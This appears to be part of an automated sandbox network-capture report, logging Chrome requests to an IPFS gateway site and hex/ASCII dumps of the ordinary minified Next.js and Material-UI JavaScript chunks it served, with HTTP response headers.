                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 74 3a 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 26 26 28 6e 3d 6e 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 72 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79
                                                                                                                                                                                                                                                  Data Ascii: t:e}}function T(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},n=Object.keys(r);"function"===typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(r).filter((function(e){return Object.getOwnProperty
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 2c 61 2c 69 2c 75 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 75 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 75 5b 30 5d 3f 75 5b 30 5d 3a 7b 7d 2c 44 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 5f 5f 4e 45 58 54 5f 44 41 54 41 5f 5f 22 29 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 44 41 54 41 5f 5f 3d 44 2c 24 3d 44 2e 64 65 66 61 75 6c 74 4c 6f 63 61 6c 65 2c 74 3d 44 2e 61 73 73 65 74
                                                                                                                                                                                                                                                  Data Ascii: unction e(){var t,a,i,u=arguments;return n.wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return u.length>0&&void 0!==u[0]?u[0]:{},D=JSON.parse(document.getElementById("__NEXT_DATA__").textContent),window.__NEXT_DATA__=D,$=D.defaultLocale,t=D.asset
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 73 2c 6c 3d 22 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 3b 73 26 26 73 2e 6c 65 6e 67 74 68 26 26 28 74 3d 73 5b 30 5d 2e 73 74 61 72 74 54 69 6d 65 29 3b 76 61 72 20 66 3d 7b 69 64 3a 72 7c 7c 6c 2c 6e 61 6d 65 3a 6e 2c 73 74 61 72 74 54 69 6d 65 3a 6f 7c 7c 74 2c 76 61 6c 75 65 3a 6e 75 6c 6c 3d 3d 61 3f 69 3a 61 2c 6c 61 62 65 6c 3a 22 6d 61 72 6b 22 3d 3d 3d 75 7c 7c 22 6d 65 61 73 75 72 65 22 3d 3d 3d 75 3f 22 63 75 73 74 6f 6d 22 3a 22 77 65 62 2d 76 69 74 61 6c 22 7d 3b 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 7c 7c 63 28 66 29 2c 6b 2e 74 72
                                                                                                                                                                                                                                                  Data Ascii: s,l="".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12);s&&s.length&&(t=s[0].startTime);var f={id:r||l,name:n,startTime:o||t,value:null==a?i:a,label:"mark"===u||"measure"===u?"custom":"web-vital"};null===c||void 0===c||c(f),k.tr
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 6e 20 6e 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 21 74 2e 65 72 72 29 7b 65 2e 6e 65 78 74 3d 34 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 33 2c 5a 28 74 29 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 34 2c 65 2e 6e 65 78 74 3d 37 2c 63 65 28 74 29 3b 63 61 73 65 20 37 3a 65 2e 6e 65 78 74 3d 31 37 3b 62 72 65 61 6b 3b 63 61 73 65 20 39 3a 69 66 28 65 2e 70 72 65 76 3d 39 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 34 29 2c 21 28 72 3d 52 2e 67 65 74 50 72 6f 70 65 72 45 72 72 6f 72 28
                                                                                                                                                                                                                                                  Data Ascii: n n.wrap((function(e){for(;;)switch(e.prev=e.next){case 0:if(!t.err){e.next=4;break}return e.next=3,Z(t);case 3:return e.abrupt("return");case 4:return e.prev=4,e.next=7,ce(t);case 7:e.next=17;break;case 9:if(e.prev=9,e.t0=e.catch(4),!(r=R.getProperError(
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 2d 68 79 64 72 61 74 69 6f 6e 22 2c 22 62 65 66 6f 72 65 52 65 6e 64 65 72 22 2c 22 61 66 74 65 72 48 79 64 72 61 74 65 22 29 2c 7a 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 4e 61 6d 65 28 22 4e 65 78 74 2e 6a 73 2d 68 79 64 72 61 74 69 6f 6e 22 29 2e 66 6f 72 45 61 63 68 28 7a 29 2c 6e 65 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 28 29 7b 69 66 28 62 2e 53 54 29 7b 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 61 66 74 65 72 52 65 6e 64 65 72 22 29 3b 76 61 72 20 65 3d 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 4e 61 6d 65 28 22 72 6f 75 74 65 43 68 61 6e 67 65 22 2c 22 6d 61 72 6b 22 29 3b 65 2e 6c 65 6e 67 74 68 26 26 28 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 61 73 75 72 65
                                                                                                                                                                                                                                                  Data Ascii: -hydration","beforeRender","afterHydrate"),z&&performance.getEntriesByName("Next.js-hydration").forEach(z),ne())}function re(){if(b.ST){performance.mark("afterRender");var e=performance.getEntriesByName("routeChange","mark");e.length&&(performance.measure
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 28 65 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 74 29 29 7d 76 61 72 20 69 65 2c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 54 28 7b 7d 2c 74 2c 7b 43 6f 6d 70 6f 6e 65 6e 74 3a 56 2c 65 72 72 3a 44 2e 65 72 72 2c 72 6f 75 74 65 72 3a 4e 7d 29 3b 72 65 74 75 72 6e 20 66 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 65 2c 6e 75 6c 6c 2c 61 65 28 65 2c 72 29 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 65 2e 41 70 70 2c 72 3d 65 2e 43 6f 6d 70 6f 6e 65 6e 74 2c 6e 3d 65 2e 70 72 6f 70 73 2c 6f 3d 65 2e 65 72 72 2c 61 3d 65 2e 5f 5f 4e 5f 52 53 43 2c 69 3d 22 69 6e 69 74 69 61 6c 22 69 6e 20 65 3f 76 6f 69 64 20 30
                                                                                                                                                                                                                                                  Data Ascii: (e,Object.assign({},t))}var ie,ue=function(e){return function(t){var r=T({},t,{Component:V,err:D.err,router:N});return f.default.createElement(oe,null,ae(e,r))}};function ce(e){var t=e.App,r=e.Component,n=e.props,o=e.err,a=e.__N_RSC,i="initial"in e?void 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  85192.168.2.549802209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC504OUTGET /_next/static/chunks/3645-9203dd9404a3977e.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 9656
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreig6ffkgzbfciggs7am2li4b24glxalxql72uqcbc7wuwxhhidetpm"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/3645-9203dd9404a3977e.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreig6ffkgzbfciggs7am2li4b24glxalxql72uqcbc7wuwxhhidetpm
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028480
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 32 38 65 64 62 34 31 66 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4328edb41f8-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 34 35 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 76 61 72 20 6e 3d 6f 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 6e 28 6f 28 36 34 39 33 38 29 29 2c 69 3d 6f 28 38 35 38 39 33 29 2c 61 3d 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3645],{62753:function(e,t,o){var n=o(64836);t.Z=void 0;var r=n(o(64938)),i=o(85893),a=(0,r.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 61 72 20 5a 3d 28 30 2c 6f 28 31 35 38 38 29 2e 5a 29 28 22 4d 75 69 43 68 65 63 6b 62 6f 78 22 2c 5b 22 72 6f 6f 74 22 2c 22 63 68 65 63 6b 65 64 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 22 2c 22 63 6f 6c 6f 72 50 72 69 6d 61 72 79 22 2c 22 63 6f 6c 6f 72 53 65 63 6f 6e 64 61 72 79 22 5d 29 3b 63 6f 6e 73 74 20 67 3d 5b 22 63 68 65 63 6b 65 64 49 63 6f 6e 22 2c 22 63 6f 6c 6f 72 22 2c 22 69 63 6f 6e 22 2c 22 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 22 2c 22 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 49 63 6f 6e 22 2c 22 69 6e 70 75 74 50 72 6f 70 73 22 2c 22 73 69 7a 65 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 5d 2c 6b 3d 28 30 2c 62 2e 5a 50 29 28 6c 2e 5a 2c 7b 73 68 6f 75 6c 64 46 6f 72 77 61 72 64 50 72 6f 70 3a 65 3d
                                                                                                                                                                                                                                                  Data Ascii: ar Z=(0,o(1588).Z)("MuiCheckbox",["root","checked","disabled","indeterminate","colorPrimary","colorSecondary"]);const g=["checkedIcon","color","icon","indeterminate","indeterminateIcon","inputProps","size","className"],k=(0,b.ZP)(l.Z,{shouldForwardProp:e=
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 24 3d 68 3f 62 3a 64 2c 6a 3d 28 30 2c 72 2e 5a 29 28 7b 7d 2c 6c 2c 7b 63 6f 6c 6f 72 3a 70 2c 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 3a 68 2c 73 69 7a 65 3a 5a 7d 29 2c 45 3d 28 65 3d 3e 7b 63 6f 6e 73 74 7b 63 6c 61 73 73 65 73 3a 74 2c 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 3a 6f 2c 63 6f 6c 6f 72 3a 6e 7d 3d 65 2c 69 3d 7b 72 6f 6f 74 3a 5b 22 72 6f 6f 74 22 2c 6f 26 26 22 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 22 2c 60 63 6f 6c 6f 72 24 7b 28 30 2c 76 2e 5a 29 28 6e 29 7d 60 5d 7d 2c 61 3d 28 30 2c 73 2e 5a 29 28 69 2c 79 2c 74 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 5a 29 28 7b 7d 2c 74 2c 61 29 7d 29 28 6a 29 3b 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 29 28 6b 2c 28 30 2c 72 2e 5a 29 28 7b 74 79 70 65 3a 22 63 68 65 63 6b 62 6f 78 22 2c 69 6e 70
                                                                                                                                                                                                                                                  Data Ascii: $=h?b:d,j=(0,r.Z)({},l,{color:p,indeterminate:h,size:Z}),E=(e=>{const{classes:t,indeterminate:o,color:n}=e,i={root:["root",o&&"indeterminate",`color${(0,v.Z)(n)}`]},a=(0,s.Z)(i,y,t);return(0,r.Z)({},t,a)})(j);return(0,u.jsx)(k,(0,r.Z)({type:"checkbox",inp
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 73 65 63 6f 6e 64 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 65 63 6f 6e 64 61 72 79 2e 6d 61 69 6e 2c 69 6e 66 6f 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 69 6e 66 6f 2e 6d 61 69 6e 2c 73 75 63 63 65 73 73 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 75 63 63 65 73 73 2e 6d 61 69 6e 2c 77 61 72 6e 69 6e 67 3a
                                                                                                                                                                                                                                                  Data Ascii: ),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.main,secondary:(e.vars||e).palette.secondary.main,info:(e.vars||e).palette.info.main,success:(e.vars||e).palette.success.main,warning:
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 63 6f 6e 73 74 20 76 3d 28 30 2c 64 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 6f 3d 28 30 2c 72 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 28 30 2c 61 2e 6b 39 29 28 7b 74 68 65 6d 65 3a 74 7d 2c 28 30 2c 61 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 64 69 72 65 63 74 69 6f 6e 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 74 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 76 61 6c 75 65 73 7d 29 2c 28 65
                                                                                                                                                                                                                                                  Data Ascii: const v=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let o=(0,r.Z)({display:"flex",flexDirection:"column"},(0,a.k9)({theme:t},(0,a.P$)({values:e.direction,breakpoints:t.breakpoints.values}),(e
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 32 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 72 65 66 3a 74 7d 2c 65 29 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 4d 35 20 31 33 6c 34 20 34 4c 31 39 20 37 22 7d 29 29 7d 29 29 3b 74 2e 5a 3d 72 7d 2c 38 30 32 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 76 61 72 20 6e 3d 6f 28 36 37
                                                                                                                                                                                                                                                  Data Ascii: //www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:2,stroke:"currentColor","aria-hidden":"true",ref:t},e),n.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M5 13l4 4L19 7"}))}));t.Z=r},80227:function(e,t,o){var n=o(67
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6f 6e 43 6f 6e 74 65 6e 74 56 69 73 69 62 6c 65 3a 6e 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 5b 72 5d 3d 65 2c 7b 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 3a 69 7d 3d 72 3b 69 66 28 69 29 7b 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 76 69 73 69 62 6c 65 3a 21 30 7d 2c 28 28 29 3d 3e 7b 6e 26 26 6e 28 29 7d 29 29 3b 63 6f 6e 73 74 20 65 3d 6e 75 6c 6c 3d 3d 28 74 3d 74 68 69 73 2e 77 72 61 70 70 65 72 29 3f 76 6f 69 64 20 30 3a 74 2e 63 75 72 72 65 6e 74 3b 65 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 28 6e 75 6c 6c 3d 3d 28 6f 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 4f 62 73 65 72 76 65 72 29 7c 7c 6f 2e 75 6e 6f 62 73 65 72 76 65 28 65 29 29 7d 7d 29 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 4f 62 73 65 72 76
                                                                                                                                                                                                                                                  Data Ascii: onContentVisible:n}=this.props,[r]=e,{isIntersecting:i}=r;if(i){this.setState({visible:!0},(()=>{n&&n()}));const e=null==(t=this.wrapper)?void 0:t.current;e&&e instanceof HTMLElement&&(null==(o=this.elementObserver)||o.unobserve(e))}})),this.elementObserv
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC137INData Raw: 72 65 6e 2e 6f 6e 6c 79 28 65 29 29 7d 7d 69 28 63 2c 22 64 65 66 61 75 6c 74 50 72 6f 70 73 22 2c 7b 65 6c 65 6d 65 6e 74 54 79 70 65 3a 22 64 69 76 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 22 2c 6f 66 66 73 65 74 3a 30 2c 74 68 72 65 73 68 6f 6c 64 3a 30 2c 77 69 64 74 68 3a 6e 75 6c 6c 2c 6f 6e 43 6f 6e 74 65 6e 74 56 69 73 69 62 6c 65 3a 6e 75 6c 6c 2c 68 65 69 67 68 74 3a 6e 75 6c 6c 7d 29 7d 7d 5d 29 3b
                                                                                                                                                                                                                                                  Data Ascii: ren.only(e))}}i(c,"defaultProps",{elementType:"div",className:"",offset:0,threshold:0,width:null,onContentVisible:null,height:null})}}]);


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  86192.168.2.549803209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC504OUTGET /_next/static/chunks/1506-405d1202a4254f54.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 8048
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreig4476ym6ry7jt6m5uunhf5xgztlz6g7zvub6ud5bzzovm4gobgru"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1506-405d1202a4254f54.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreig4476ym6ry7jt6m5uunhf5xgztlz6g7zvub6ud5bzzovm4gobgru
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028481
